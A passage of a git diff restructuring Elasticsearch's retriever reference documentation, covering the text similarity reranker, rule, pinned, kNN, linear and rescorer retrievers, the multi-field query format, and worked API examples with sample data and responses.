reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third-party text similarity models supported by {{es}}. - -You have the following options: - -* Use the built-in [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) cross-encoder model via the inference API’s {{es}} service. See [this example](https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html#inference-example-elastic-reranker) for creating an endpoint using the Elastic Rerank model. -* Use the [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. -* Use the [Google Vertex AI inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. -* Upload a model to {{es}} with [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch) using the `text_similarity` NLP task type. - - * Then set up an [{{es}} service inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. - * Refer to the [example](#text-similarity-reranker-retriever-example-eland) on this page for a step-by-step guide. - - -::::{important} -Scores from the re-ranking process are normalized using the following formula before returned to the user, to avoid having negative scores. - -```text -score = max(score, 0) + min(exp(score), 1) -``` - -Using the above, any initially negative scores are projected to (0, 1) and positive scores to [1, infinity). To revert back if needed, one can use: - -```text -score = score - 1, if score >= 0 -score = ln(score), if score < 0 -``` - -:::: - - - -#### Parameters [text-similarity-reranker-retriever-parameters] - -`retriever` -: (Required, `retriever`) - - The child retriever that generates the initial set of top documents to be re-ranked. - - -`field` -: (Required, `string`) - - The document field to be used for text similarity comparisons. This field should contain the text that will be evaluated against the `inferenceText`. - - -`inference_id` -: (Optional, `string`) - - Unique identifier of the inference endpoint created using the {{infer}} API. If you don’t specify an inference endpoint, the `inference_id` field defaults to `.rerank-v1-elasticsearch`, a preconfigured endpoint for the elasticsearch `.rerank-v1` model. - - -`inference_text` -: (Required, `string`) - - The text snippet used as the basis for similarity comparison. - - -`rank_window_size` -: (Optional, `int`) - - The number of top documents to consider in the re-ranking process. Defaults to `10`. - - -`min_score` -: (Optional, `float`) - - Sets a minimum threshold score for including documents in the re-ranked results. Documents with similarity scores below this threshold will be excluded. Note that score calculations vary depending on the model used. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the child `retriever`. If the child retriever already specifies any filters, then this top-level filter is applied in conjuction with the filter defined in the child retriever. - - - -### Example: Elastic Rerank [text-similarity-reranker-retriever-example-elastic-rerank] - -::::{tip} -Refer to this [Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/search/12-semantic-reranking-elastic-rerank.ipynb) for an end-to-end example using Elastic Rerank. - -:::: - - -This example demonstrates how to deploy the [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) model and use it to re-rank search results using the `text_similarity_reranker` retriever. - -Follow these steps: - -1. Create an inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). - - ```console - PUT _inference/rerank/my-elastic-rerank - { - "service": "elasticsearch", - "service_settings": { - "model_id": ".rerank-v1", - "num_threads": 1, - "adaptive_allocations": { <1> - "enabled": true, - "min_number_of_allocations": 1, - "max_number_of_allocations": 10 - } - } - } - ``` - - 1. [Adaptive allocations](docs-content://deploy-manage/autoscaling/trained-model-autoscaling.md#enabling-autoscaling-through-apis-adaptive-allocations) will be enabled with the minimum of 1 and the maximum of 10 allocations. - -2. Define a `text_similarity_rerank` retriever: - - ```console - POST _search - { - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match": { - "text": "How often does the moon hide the sun?" - } - } - } - }, - "field": "text", - "inference_id": "my-elastic-rerank", - "inference_text": "How often does the moon hide the sun?", - "rank_window_size": 100, - "min_score": 0.5 - } - } - } - ``` - - - -### Example: Cohere Rerank [text-similarity-reranker-retriever-example-cohere] - -This example enables out-of-the-box semantic search by re-ranking top documents using the Cohere Rerank API. This approach eliminates the need to generate and store embeddings for all indexed documents. This requires a [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) that is set up for the `rerank` task type. +And we run this query: ```console -GET /index/_search -{ - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match_phrase": { - "text": "landmark in Paris" - } - } - } - }, - "field": "text", - "inference_id": "my-cohere-rerank-model", - "inference_text": "Most famous landmark in Paris", - "rank_window_size": 100, - "min_score": 0.5 - } - } -} -``` - - -### Example: Semantic re-ranking with a Hugging Face model [text-similarity-reranker-retriever-example-eland] - -The following example uses the `cross-encoder/ms-marco-MiniLM-L-6-v2` model from Hugging Face to rerank search results based on semantic similarity. The model must be uploaded to {{es}} using [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch). - -::::{tip} -Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third party text similarity models supported by {{es}}. - -:::: - - -Follow these steps to load the model and create a semantic re-ranker. - -1. Install Eland using `pip` - - ```sh - python -m pip install eland[pytorch] - ``` - -2. Upload the model to {{es}} using Eland. This example assumes you have an Elastic Cloud deployment and an API key. Refer to the [Eland documentation](eland://reference/machine-learning.md#ml-nlp-pytorch-auth) for more authentication options. - - ```sh - eland_import_hub_model \ - --cloud-id $CLOUD_ID \ - --es-api-key $ES_API_KEY \ - --hub-model-id cross-encoder/ms-marco-MiniLM-L-6-v2 \ - --task-type text_similarity \ - --clear-previous \ - --start - ``` - -3. Create an inference endpoint for the `rerank` task - - ```console - PUT _inference/rerank/my-msmarco-minilm-model - { - "service": "elasticsearch", - "service_settings": { - "num_allocations": 1, - "num_threads": 1, - "model_id": "cross-encoder__ms-marco-minilm-l-6-v2" - } - } - ``` - -4. Define a `text_similarity_rerank` retriever. - - ```console - POST movies/_search - { - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match": { - "genre": "drama" - } - } - } - }, - "field": "plot", - "inference_id": "my-msmarco-minilm-model", - "inference_text": "films that explore psychological depths" - } - } - } - ``` - - This retriever uses a standard `match` query to search the `movie` index for films tagged with the genre "drama". It then re-ranks the results based on semantic similarity to the text in the `inference_text` parameter, using the model we uploaded to {{es}}. - - - - -## Query Rules Retriever [rule-retriever] - -The `rule` retriever enables fine-grained control over search results by applying contextual [query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. This retriever has similar functionality to the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md), but works out of the box with other retrievers. - -### Prerequisites [_prerequisites_16] - -To use the `rule` retriever you must first create one or more query rulesets using the [query rules management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules). - - -#### Parameters [rule-retriever-parameters] - -`retriever` -: (Required, `retriever`) - - The child retriever that returns the results to apply query rules on top of. This can be a standalone retriever such as the [standard](#standard-retriever) or [knn](#knn-retriever) retriever, or it can be a compound retriever. - - -`ruleset_ids` -: (Required, `array`) - - An array of one or more unique [query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) IDs with query-based rules to match and apply as applicable. Rulesets and their associated rules are evaluated in the order in which they are specified in the query and ruleset. The maximum number of rulesets to specify is 10. - - -`match_criteria` -: (Required, `object`) - - Defines the match criteria to apply to rules in the given query ruleset(s). Match criteria should match the keys defined in the `criteria.metadata` field of the rule. - - -`rank_window_size` -: (Optional, `int`) - - The number of top documents to return from the `rule` retriever. Defaults to `10`. - - - -### Example: Rule retriever [rule-retriever-example] - -This example shows the rule retriever executed without any additional retrievers. It runs the query defined by the `retriever` and applies the rules from `my-ruleset` on top of the returned results. - -```console -GET movies/_search +GET books/_search { "retriever": { - "rule": { - "match_criteria": { - "query_string": "harry potter" - }, - "ruleset_ids": [ - "my-ruleset" + "linear": { + "query": "elasticsearch", + "fields": [ + "title", + "description", + "title_semantic", + "description_semantic" ], - "retriever": { - "standard": { - "query": { - "query_string": { - "query": "harry potter" - } - } - } - } + "normalizer": "minmax" } } } ``` +The score breakdown would be: -### Example: Rule retriever combined with RRF [rule-retriever-example-rrf] - -This example shows how to combine the `rule` retriever with other rerank retrievers such as [rrf](#rrf-retriever) or [text_similarity_reranker](#text-similarity-reranker-retriever). - -::::{warning} -The `rule` retriever will apply rules to any documents returned from its defined `retriever` or any of its sub-retrievers. This means that for the best results, the `rule` retriever should be the outermost defined retriever. Nesting a `rule` retriever as a sub-retriever under a reranker such as `rrf` or `text_similarity_reranker` may not produce the expected results. - -:::: +* Lexical fields (50% of score): + * `title`: 50% of lexical fields group score, 25% of final score + * `description`: 50% of lexical fields group score, 25% of final score +* Semantic fields (50% of score): + * `title_semantic`: 50% of semantic fields group score, 25% of final score + * `description_semantic`: 50% of semantic fields group score, 25% of final score +If we apply per-field boosts like so: ```console -GET movies/_search +GET books/_search { "retriever": { - "rule": { <1> - "match_criteria": { - "query_string": "harry potter" - }, - "ruleset_ids": [ - "my-ruleset" + "linear": { + "query": "elasticsearch", + "fields": [ + "title^3", + "description^2", + "title_semantic", + "description_semantic^2" ], - "retriever": { - "rrf": { <2> - "retrievers": [ - { - "standard": { - "query": { - "query_string": { - "query": "sorcerer's stone" - } - } - } - }, - { - "standard": { - "query": { - "query_string": { - "query": "chamber of secrets" - } - } - } - } - ] - } - } + "normalizer": "minmax" } } } ``` -1. The `rule` retriever is the outermost retriever, applying rules to the search results that were previously reranked using the `rrf` retriever. -2. The `rrf` retriever returns results from all of its sub-retrievers, and the output of the `rrf` retriever is used as input to the `rule` retriever. - -## Pinned Retriever [pinned-retriever] -```yaml {applies_to} -stack: ga 9.1 -``` - - -A `pinned` retriever returns top documents by always placing specific documents at the top of the results, with the remaining hits provided by a secondary retriever. This retriever offers similar functionality to the [pinned query](/reference/query-languages/query-dsl/query-dsl-pinned-query.md), but works seamlessly with other retrievers. This is useful for promoting certain documents for particular queries, regardless of their relevance score. - -#### Parameters [pinned-retriever-parameters] - -`ids` -: (Optional, array of strings) - - A list of document IDs to pin at the top of the results, in the order provided. - -`docs` -: (Optional, array of objects) - - A list of objects specifying documents to pin. Each object must contain at least an `_id` field, and may also specify `_index` if pinning documents across multiple indices. +The score breakdown would change to: -`retriever` -: (Optional, retriever object) +* Lexical fields (50% of score): + * `title`: 60% of lexical fields group score, 30% of final score + * `description`: 40% of lexical fields group score, 20% of final score +* Semantic fields (50% of score): + * `title_semantic`: 33% of semantic fields group score, 16.5% of final score + * `description_semantic`: 66% of semantic fields group score, 33% of final score - A retriever (for example a `standard` retriever or a specialized retriever such as `rrf` retriever) used to retrieve the remaining documents after the pinned ones. +### Wildcard field patterns [multi-field-wildcard-field-patterns] -Either `ids` or `docs` must be specified. - -### Example using `docs` [pinned-retriever-example-documents] +Field names support the `*` wildcard character to match multiple fields: ```console -GET /restaurants/_search +GET books/_search { "retriever": { - "pinned": { - "docs": [ - { "_id": "doc1", "_index": "my-index" }, - { "_id": "doc2" } - ], - "retriever": { - "standard": { - "query": { - "match": { - "title": "elasticsearch" - } - } - } - } + "rrf": { + "query": "machine learning", + "fields": [ + "title*", <1> + "*_text" <2> + ] } } } ``` -## Common usage guidelines [retriever-common-parameters] +1. Match fields that start with `title` +2. Match fields that end with `_text` +Note, however, that wildcard field patterns will only resolve to fields that either: -### Using `from` and `size` with a retriever tree [retriever-size-pagination] +- Support term queries, such as `keyword` and `text` fields +- Are `semantic_text` fields -The [`from`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-from-param) and [`size`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param) parameters are provided globally as part of the general [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). They are applied to all retrievers in a retriever tree, unless a specific retriever overrides the `size` parameter using a different parameter such as `rank_window_size`. Though, the final search hits are always limited to `size`. +### Limitations +- **Single index**: Multi-field queries currently work with single index searches only +- **CCS (Cross Cluster Search)**: Multi-field queries do not support remote cluster searches -### Using aggregations with a retriever tree [retriever-aggregations] - -[Aggregations](/reference/aggregations/index.md) are globally specified as part of a search request. The query used for an aggregation is the combination of all leaf retrievers as `should` clauses in a [boolean query](/reference/query-languages/query-dsl/query-dsl-bool-query.md). +### Examples - -### Restrictions on search parameters when specifying a retriever [retriever-restrictions] - -When a retriever is specified as part of a search, the following elements are not allowed at the top-level: - -* [`query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-query) -* [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn) -* [`search_after`](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) -* [`terminate_after`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-terminate-after) -* [`sort`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-sort-param) -* [`rescore`](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) use a [rescorer retriever](#rescorer-retriever) instead +- [RRF with the multi-field query format](retrievers/retrievers-examples.md#retrievers-examples-rrf-multi-field-query-format) +- [Linear retriever with the multi-field query format](retrievers/retrievers-examples.md#retrievers-examples-linear-multi-field-query-format) \ No newline at end of file diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md new file mode 100644 index 0000000000000..12da522214383 --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md @@ -0,0 +1,109 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# kNN retriever [knn-retriever] + +A kNN retriever returns top documents from a [k-nearest neighbor search (kNN)](docs-content://solutions/search/vector/knn.md). + + +## Parameters [knn-retriever-parameters] + +`field` +: (Required, string) + + The name of the vector field to search against. Must be a [`dense_vector` field with indexing enabled](/reference/elasticsearch/mapping-reference/dense-vector.md#index-vectors-knn-search). + + +`query_vector` +: (Required if `query_vector_builder` is not defined, array of `float`) + + Query vector. Must have the same number of dimensions as the vector field you are searching against. Must be either an array of floats or a hex-encoded byte vector. + + +`query_vector_builder` +: (Required if `query_vector` is not defined, query vector builder object) + + Defines a [model](docs-content://solutions/search/vector/knn.md#knn-semantic-search) to build a query vector. + + +`k` +: (Required, integer) + + Number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`. + + +`num_candidates` +: (Required, integer) + + The number of nearest neighbor candidates to consider per shard. Needs to be greater than `k`, or `size` if `k` is omitted, and cannot exceed 10,000. {{es}} collects `num_candidates` results from each shard, then merges them to find the top `k` results. Increasing `num_candidates` tends to improve the accuracy of the final `k` results. Defaults to `Math.min(1.5 * k, 10_000)`. + + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Query to filter the documents that can match. The kNN search will return the top `k` documents that also match this filter. The value can be a single query or a list of queries. If `filter` is not provided, all documents are allowed to match. + + +`similarity` +: (Optional, float) + + The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used. Not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied. + + The `similarity` parameter is the direct vector similarity calculation. + + * `l2_norm`: also known as Euclidean, will include documents where the vector is within the `dims` dimensional hypersphere with radius `similarity` with origin at `query_vector`. + * `cosine`, `dot_product`, and `max_inner_product`: Only return vectors where the cosine similarity or dot-product are at least the provided `similarity`. + + Read more here: [knn similarity search](docs-content://solutions/search/vector/knn.md#knn-similarity-search) + + +`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1` +: (Optional, object) Apply oversampling and rescoring to quantized vectors. + +::::{note} +Rescoring only makes sense for quantized vectors; when [quantization](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) is not used, the original vectors are used for scoring. Rescore option will be ignored for non-quantized `dense_vector` fields. +:::: + + +`oversample` +: (Required, float) + + Applies the specified oversample factor to `k` on the approximate kNN search. The approximate kNN search will: + + * Retrieve `num_candidates` candidates per shard. + * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors. + * The top `k` rescored candidates will be returned. + + +See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. + + +## Restrictions [_restrictions_2] + +The parameters `query_vector` and `query_vector_builder` cannot be used together. + + +## Example [knn-retriever-example] + +```console +GET /restaurants/_search +{ + "retriever": { + "knn": { <1> + "field": "vector", <2> + "query_vector": [10, 22, 77], <3> + "k": 10, <4> + "num_candidates": 10 <5> + } + } +} +``` + +1. Configuration for k-nearest neighbor (knn) search, which is based on vector similarity. +2. Specifies the field name that contains the vectors. +3. The query vector against which document vectors are compared in the `knn` search. +4. The number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`. +5. The size of the initial candidate set from which the final `k` nearest neighbors are selected. diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md new file mode 100644 index 0000000000000..a0babd1bc9ecc --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md @@ -0,0 +1,93 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Linear retriever [linear-retriever] + +A retriever that normalizes and linearly combines the scores of other retrievers. + + +## Parameters [linear-retriever-parameters] + +::::{note} +Either `query` or `retrievers` must be specified. +Combining `query` and `retrievers` is not supported. +:::: + +`query` {applies_to}`stack: ga 9.1` +: (Optional, String) + + The query to use when using the [multi-field query format](../retrievers.md#multi-field-query-format). + +`fields` {applies_to}`stack: ga 9.1` +: (Optional, array of strings) + + The fields to query when using the [multi-field query format](../retrievers.md#multi-field-query-format). + Fields can include boost values using the `^` notation (e.g., `"field^2"`). + If not specified, uses the index's default fields from the `index.query.default_field` index setting, which is `*` by default. + +`normalizer` {applies_to}`stack: ga 9.1` +: (Optional, String) + + The normalizer to use when using the [multi-field query format](../retrievers.md#multi-field-query-format). + See [normalizers](#linear-retriever-normalizers) for supported values. + Required when `query` is specified. + + ::::{warning} + Avoid using `none` as that will disable normalization and may bias the result set towards lexical matches. + See [field grouping](../retrievers.md#multi-field-field-grouping) for more information. + :::: + +`retrievers` +: (Optional, array of objects) + + A list of the sub-retrievers' configuration, that we will take into account and whose result sets we will merge through a weighted sum. + Each configuration can have a different weight and normalization depending on the specified retriever. + +`rank_window_size` +: (Optional, integer) + + This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance. + The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). + `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. + Defaults to 10. + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. + +Each entry in the `retrievers` array specifies the following parameters: + +`retriever` +: (Required, a `retriever` object) + + Specifies the retriever for which we will compute the top documents for. The retriever will produce `rank_window_size` results, which will later be merged based on the specified `weight` and `normalizer`. + +`weight` +: (Optional, float) + + The weight that each score of this retriever’s top docs will be multiplied with. Must be greater or equal to 0. Defaults to 1.0. + +`normalizer` +: (Optional, String) + + Specifies how the retriever’s score will be normalized before applying the specified `weight`. + See [normalizers](#linear-retriever-normalizers) for supported values. + Defaults to `none`. + +See also [this hybrid search example](retrievers-examples.md#retrievers-examples-linear-retriever) using a linear retriever on how to independently configure and apply normalizers to retrievers. + +## Normalizers [linear-retriever-normalizers] + +The `linear` retriever supports the following normalizers: + +* `none`: No normalization +* `minmax`: Normalizes scores based on the following formula: + + ``` + score = (score - min) / (max - min) + ``` +* `l2_norm`: Normalizes scores using the L2 norm of the score values diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md new file mode 100644 index 0000000000000..572fae25b333f --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md @@ -0,0 +1,55 @@ +--- +applies_to: + stack: ga 9.1 + serverless: ga +--- + +# Pinned retriever [pinned-retriever] + +A `pinned` retriever returns top documents by always placing specific documents at the top of the results, with the remaining hits provided by a secondary retriever. + +This retriever offers similar functionality to the [pinned query](/reference/query-languages/query-dsl/query-dsl-pinned-query.md), but works seamlessly with other retrievers. This is useful for promoting certain documents for particular queries, regardless of their relevance score. + +## Parameters [pinned-retriever-parameters] + +`ids` +: (Optional, array of strings) + + A list of document IDs to pin at the top of the results, in the order provided. + +`docs` +: (Optional, array of objects) + + A list of objects specifying documents to pin. Each object must contain at least an `_id` field, and may also specify `_index` if pinning documents across multiple indices. + +`retriever` +: (Optional, retriever object) + + A retriever (for example a `standard` retriever or a specialized retriever such as `rrf` retriever) used to retrieve the remaining documents after the pinned ones. + +Either `ids` or `docs` must be specified. + +## Example using `docs` [pinned-retriever-example-documents] + +```console +GET /restaurants/_search +{ + "retriever": { + "pinned": { + "docs": [ + { "_id": "doc1", "_index": "my-index" }, + { "_id": "doc2" } + ], + "retriever": { + "standard": { + "query": { + "match": { + "title": "elasticsearch" + } + } + } + } + } + } +} +``` diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md new file mode 100644 index 0000000000000..b9f12e6dce795 --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md @@ -0,0 +1,123 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Rescorer retriever [rescorer-retriever] + +The `rescorer` retriever re-scores only the results produced by its child retriever. For the `standard` and `knn` retrievers, the `window_size` parameter specifies the number of documents examined per shard. + +For compound retrievers like `rrf`, the `window_size` parameter defines the total number of documents examined globally. + +When using the `rescorer`, an error is returned if the following conditions are not met: + +* The minimum configured rescore’s `window_size` is: + + * Greater than or equal to the `size` of the parent retriever for nested `rescorer` setups. + * Greater than or equal to the `size` of the search request when used as the primary retriever in the tree. + +* And the maximum rescore’s `window_size` is: + + * Smaller than or equal to the `size` or `rank_window_size` of the child retriever. + +## Parameters [rescorer-retriever-parameters] + +`rescore` +: (Required. [A rescorer definition or an array of rescorer definitions](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore)) + + Defines the [rescorers](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) applied sequentially to the top documents returned by the child retriever. + + +`retriever` +: (Required. `retriever`) + + Specifies the child retriever responsible for generating the initial set of top documents to be re-ranked. + + +`filter` +: (Optional. [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the retriever, ensuring that all documents match the filter criteria without affecting their scores. + + + +## Example [rescorer-retriever-example] + +The `rescorer` retriever can be placed at any level within the retriever tree. The following example demonstrates a `rescorer` applied to the results produced by an `rrf` retriever: + +```console +GET movies/_search +{ + "size": 10, <1> + "retriever": { + "rescorer": { <2> + "rescore": { + "window_size": 50, <3> + "query": { <4> + "rescore_query": { + "script_score": { + "query": { + "match_all": {} + }, + "script": { + "source": "cosineSimilarity(params.queryVector, 'product-vector_final_stage') + 1.0", + "params": { + "queryVector": [-0.5, 90.0, -10, 14.8, -156.0] + } + } + } + } + } + }, + "retriever": { <5> + "rrf": { + "rank_window_size": 100, <6> + "retrievers": [ + { + "standard": { + "query": { + "sparse_vector": { + "field": "plot_embedding", + "inference_id": "my-elser-model", + "query": "films that explore psychological depths" + } + } + } + }, + { + "standard": { + "query": { + "multi_match": { + "query": "crime", + "fields": [ + "plot", + "title" + ] + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [10, 22, 77], + "k": 10, + "num_candidates": 10 + } + } + ] + } + } + } + } +} +``` + +1. Specifies the number of top documents to return in the final response. +2. A `rescorer` retriever applied as the final step. +3. Defines the number of documents to rescore from the child retriever. +4. The definition of the `query` rescorer. +5. Specifies the child retriever definition. +6. Defines the number of documents returned by the `rrf` retriever, which limits the available documents to + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md b/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md new file mode 100644 index 0000000000000..b9dcc24a841ed --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md @@ -0,0 +1,1640 @@ +--- +navigation_title: Examples +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/_retrievers_examples.html +applies_to: + stack: + serverless: +products: + - id: elasticsearch +--- + +# Retrievers examples [retrievers-examples] + +Learn how to combine different retrievers in these hands-on examples. + + +## Add example data [retrievers-examples-setup] + +To begin with, let's create the `retrievers_example` index, and add some documents to it. +We will set `number_of_shards=1` for our examples to ensure consistent and reproducible ordering. + +```console +PUT retrievers_example +{ + "settings": { + "number_of_shards": 1 + }, + "mappings": { + "properties": { + "vector": { + "type": "dense_vector", + "dims": 3, + "similarity": "l2_norm", + "index": true, + "index_options": { + "type": "flat" + } + }, + "text": { + "type": "text", + "copy_to": "text_semantic" + }, + "text_semantic": { + "type": "semantic_text" + }, + "year": { + "type": "integer" + }, + "topic": { + "type": "keyword" + }, + "timestamp": { + "type": "date" + } + } + } +} + +POST /retrievers_example/_doc/1 +{ + "vector": [0.23, 0.67, 0.89], + "text": "Large language models are revolutionizing information retrieval by boosting search precision, deepening contextual understanding, and reshaping user experiences in data-rich environments.", + "year": 2024, + "topic": ["llm", "ai", "information_retrieval"], + "timestamp": "2021-01-01T12:10:30" +} + +POST /retrievers_example/_doc/2 +{ + "vector": [0.12, 0.56, 0.78], + "text": "Artificial intelligence is transforming medicine, from advancing diagnostics and tailoring treatment plans to empowering predictive patient care for improved health outcomes.", + "year": 2023, + "topic": ["ai", "medicine"], + "timestamp": "2022-01-01T12:10:30" +} + +POST /retrievers_example/_doc/3 +{ + "vector": [0.45, 0.32, 0.91], + "text": "AI is redefining security by enabling advanced threat detection, proactive risk analysis, and dynamic defenses against increasingly sophisticated cyber threats.", + "year": 2024, + "topic": ["ai", "security"], + "timestamp": "2023-01-01T12:10:30" +} + +POST /retrievers_example/_doc/4 +{ + "vector": [0.34, 0.21, 0.98], + "text": "Elastic introduces Elastic AI Assistant, the open, generative AI sidekick powered by ESRE to democratize cybersecurity and enable users of every skill level.", + "year": 2023, + "topic": ["ai", "elastic", "assistant"], + "timestamp": "2024-01-01T12:10:30" +} + +POST /retrievers_example/_doc/5 +{ + "vector": [0.11, 0.65, 0.47], + "text": "Learn how to spin up a deployment on Elastic Cloud and use Elastic Observability to gain deeper insight into the behavior of your applications and systems.", + "year": 2024, + "topic": ["documentation", "observability", "elastic"], + "timestamp": "2025-01-01T12:10:30" +} + +POST /retrievers_example/_refresh +``` + +Now that we have our documents in place, let’s try to run some queries using retrievers. + + +## Example: Combining query and kNN with RRF [retrievers-examples-combining-standard-knn-retrievers-with-rrf] + +First, let’s examine how to combine two different types of queries: a `kNN` query and a `query_string` query. +While these queries may produce scores in different ranges, we can use Reciprocal Rank Fusion (`rrf`) to combine the results and generate a merged final result list. + +To implement this in the retriever framework, we start with the top-level element: our `rrf` retriever. +This retriever operates on top of two other retrievers: a `knn` retriever and a `standard` retriever. Our query structure would look like this: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false +} +``` + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + + +## Example: Hybrid search with linear retriever [retrievers-examples-linear-retriever] + +A different, and more intuitive, way to provide hybrid search, is to linearly combine the top documents of different retrievers using a weighted sum of the original scores. +Since, as above, the scores could lie in different ranges, we can also specify a `normalizer` that would ensure that all scores for the top ranked documents of a retriever lie in a specific range. + +To implement this, we define a `linear` retriever, and along with a set of retrievers that will generate the heterogeneous results sets that we will combine. +We will solve a problem similar to the above, by merging the results of a `standard` and a `knn` retriever. +As the `standard` retriever’s scores are based on BM25 and are not strictly bounded, we will also define a `minmax` normalizer to ensure that the scores lie in the [0, 1] range. +We will apply the same normalizer to `knn` as well to ensure that we capture the importance of each document within the result set. + +So, let’s now specify the `linear` retriever whose final score is computed as follows: + +```text +score = weight(standard) * score(standard) + weight(knn) * score(knn) +score = 2 * score(standard) + 1.5 * score(knn) +``` + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "retrievers": [ + { + "retriever": { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + "weight": 2, + "normalizer": "minmax" + }, + { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "weight": 1.5, + "normalizer": 